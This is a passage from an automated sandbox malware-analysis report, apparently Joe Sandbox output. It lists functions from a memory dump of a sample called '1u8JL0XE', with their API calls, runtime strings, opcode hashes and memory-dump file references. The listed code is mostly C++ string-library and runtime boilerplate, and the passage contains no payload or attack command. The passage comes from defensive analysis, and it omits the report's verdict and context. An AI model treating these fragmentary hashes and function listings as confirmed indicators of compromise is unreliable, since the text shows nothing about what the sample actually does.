Part of subcall function 00007FF738DBAE20: memcpy.MSVCRT ref: 00007FF738DBAEC5
Part of subcall function 00007FF738DBAE20: memcpy.MSVCRT ref: 00007FF738DBAEF0

Strings

basic_string::insert, xrefs: 00007FF738DBC2EE, 00007FF738DBC34C
basic_string::replace, xrefs: 00007FF738DBC1A0, 00007FF738DBC206, 00007FF738DBC248, 00007FF738DBC28C, 00007FF738DBC307
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBC1A7, 00007FF738DBC20D, 00007FF738DBC24F, 00007FF738DBC293, 00007FF738DBC2F5, 00007FF738DBC30E, 00007FF738DBC353

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 2619041689-3628603605
Opcode ID: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction ID: 43b8488bf9a8ff2b73a7f10017ae7adeb226ad266025690ed5314e15ddac68fb
Opcode Fuzzy Hash: acf8db3c17e877630cf77c62e067198b43ffa339475565046a16a17aaf7fc19b
Instruction Fuzzy Hash: 6F41F463A26696B1EA00BFA5DC014ADE361FB59BC8FC04036DD4D23711EE3CD549EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBF340 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF738DBF3A5

Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDF96
Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDFC1

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBF37A, 00007FF738DBF3DD, 00007FF738DBF41F, 00007FF738DBF463, 00007FF738DBF4C3, 00007FF738DBF4DC, 00007FF738DBF523
basic_string::replace, xrefs: 00007FF738DBF373, 00007FF738DBF3D6, 00007FF738DBF418, 00007FF738DBF45C, 00007FF738DBF4D5
basic_string::insert, xrefs: 00007FF738DBF4BC, 00007FF738DBF51C

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 1844840824-3628603605
Opcode ID: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction ID: 4f148d3fd3d165493c7e32f52eeec45ec71f2edc454e678dc1e1e8e7685ffc69
Opcode Fuzzy Hash: 7f7506947e0cdf472993f0743dd8d0f22e204ef2ca206140b47516d04f83e820
Instruction Fuzzy Hash: BD410263E29A92B1EE00BF69D8014A9E361FB99BC8BC05032DD4C47755EE3CE249E714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBEEA0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF738DBEF05
memcpy.MSVCRT ref: 00007FF738DBEFDA

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBEF64
basic_string::append, xrefs: 00007FF738DBEF5D, 00007FF738DBF039

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction ID: f85a239b2acfeaa1e73d656a7b7740d9e28db9d47af7b0b9d230ccf78ad4b1a3
Opcode Fuzzy Hash: fe7fef964f37f1dd9b1a180919c66d0ec6042240d860377790e12c591085c9ce
Instruction Fuzzy Hash: 1A41C063A28A96B1DE11EB69C4049BCE361FB4DBC4BD44132EE4D473A1DE3EE149D314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBBCF0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF738DBBD55
memcpy.MSVCRT ref: 00007FF738DBBE27

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBBDB9
basic_string::append, xrefs: 00007FF738DBBDB2, 00007FF738DBBE7C

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction ID: 17d0c95e2e7432797afb6b335e3be6675c14479600461136013eefa1f0c6fcb7
Opcode Fuzzy Hash: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction Fuzzy Hash: 944103A3B2868AB5DE12EB19C804578E360FB59BC0FD44031DE5E073A2DE3ED445E314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB7CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF738DB7D87

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB7D1F, 00007FF738DB7DB3
basic_string::insert, xrefs: 00007FF738DB7D15, 00007FF738DB7DBA
basic_string::_M_replace_aux, xrefs: 00007FF738DB7DC6

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 2221118986-1339558951
Opcode ID: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction ID: 00e7926bba92613131ef97f96f9966baa805c0dfae2153be704e341a9c3dc7c2
Opcode Fuzzy Hash: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction Fuzzy Hash: 88312427F25696A2EA11BB5698418E8E360AB4DFE0FC84531DF0C03390ED39E585D754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC0C80 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF738DC0C92
memcpy.MSVCRT ref: 00007FF738DC0CE4
memcpy.MSVCRT ref: 00007FF738DC0D94

Strings

basic_string::append, xrefs: 00007FF738DC0D3A

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction ID: afc70b223cec544a9e535340244f0980d15e90ac2719db3149ec849988266441
Opcode Fuzzy Hash: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction Fuzzy Hash: 8231DF63728A45A0DE11EB15E0085BDE331FB49BC4BD48532DE9D47390DE3EE889D358

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC18C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT(?,?,FFFFFFFF,00007FF738DB7139,?,?,FFFFFFFF,00007FF738DB6BB5,?,00000000,basic_string::_M_create,00007FF738DBA151), ref: 00007FF738DC18D4

Part of subcall function 00007FF738DC19A0: malloc.MSVCRT(?,?,?,?,00007FF738DC23B5,?,?,?,?,00007FF738D93C24), ref: 00007FF738DC19B1

malloc.MSVCRT(?,?,?,?,?,?,?,00007FF738DB7139,?,?,FFFFFFFF,00007FF738DB6BB5,?,00000000,basic_string::_M_create,00007FF738DBA151), ref: 00007FF738DC193A

Strings

basic_string::_M_create, xrefs: 00007FF738DC19A0

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: malloc
String ID: basic_string::_M_create
API String ID: 2803490479-3122258987
Opcode ID: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction ID: 9a3d728e5d48a97cc803edbd5642b2d4ff2a04eb202bb41711705e02dc488b71
Opcode Fuzzy Hash: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction Fuzzy Hash: C921E522B2674675EE49B765A4123B8E3A1AF4C7A0FD40634DE6D033C2DF3EA149D364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBDC10 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738DBDC22
memcpy.MSVCRT ref: 00007FF738DBDC72
memcpy.MSVCRT ref: 00007FF738DBDD21

Strings

basic_string::append, xrefs: 00007FF738DBDCCD

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
Instruction ID: 5b8f7ad2c2e275741e907ed876ae845023b982d7880bb92bf5d5ee23d6460704
Opcode Fuzzy Hash: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
Instruction Fuzzy Hash: D33100A3A18A86B0DA12FB15C448579E364EB4EBC0FC84432EEAD87385DE3DD444E318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB8580 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF738DB85FB
memcpy.MSVCRT ref: 00007FF738DB8681

Strings

basic_string::_M_create, xrefs: 00007FF738DB8586

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_create
API String ID: 3510742995-3122258987
Opcode ID: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction ID: 012a08a5dac5c3fdd0176974c010d11ca1a73ad7218b6f677987f55b9b41e07f
Opcode Fuzzy Hash: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction Fuzzy Hash: A231F333B19982B5D613BE29840867DE7606B19FC4FD84032DE2C47392DE3ED449E364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB7770 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF738DB77E2
memcpy.MSVCRT ref: 00007FF738DB781C

Strings

basic_string::assign, xrefs: 00007FF738DB7885

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: basic_string::assign
API String ID: 3510742995-2385367300
Opcode ID: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction ID: 3665e1d5c33959345e39a2a21b98646831006bfcaea230a0a5ab630255fc55ea
Opcode Fuzzy Hash: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction Fuzzy Hash: 6F31E42BB1968173EE12AA1694041B9E790AB4EBD4FC84432CE1D4B391DE3ED448E364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB17C0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF738DB181A
MultiByteToWideChar.KERNEL32 ref: 00007FF738DB185A

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction ID: e06ebe2a4523d8ecc6ffb8578c7ffc8abe33062d79825412d21cd349b4555a54
Opcode Fuzzy Hash: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction Fuzzy Hash: AD310777A1C281B6EB625B24B40036DFBA0BB89794F944230DA99877D4DF3ED588DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA3E60 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF738DA3E7D
GetProcessAffinityMask.KERNEL32 ref: 00007FF738DA3E8C
GetCurrentProcess.KERNEL32 ref: 00007FF738DA3ED2
SetProcessAffinityMask.KERNEL32 ref: 00007FF738DA3EDA

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction ID: 7fc102b17833c86ccd9d8210ca1a441e68bfdbef91b3ded1496f53db80c6ac9d
Opcode Fuzzy Hash: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction Fuzzy Hash: 66012462B1860261EE25AB29790037BD692BF8878CFD02135CE4D47780EE7EDA09E214

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E830 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF739051098,00007FF898063CA0,?,?,?,00000001,00007FF738D91261), ref: 00007FF738D9E9D5

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF738D9EAA1
Unknown pseudo relocation bit size %d., xrefs: 00007FF738D9EA95

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
Instruction ID: fdee38563f569a1ca7702d7be5a63115362e54e563d22b5b97a3b52b5d48a717
Opcode Fuzzy Hash: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
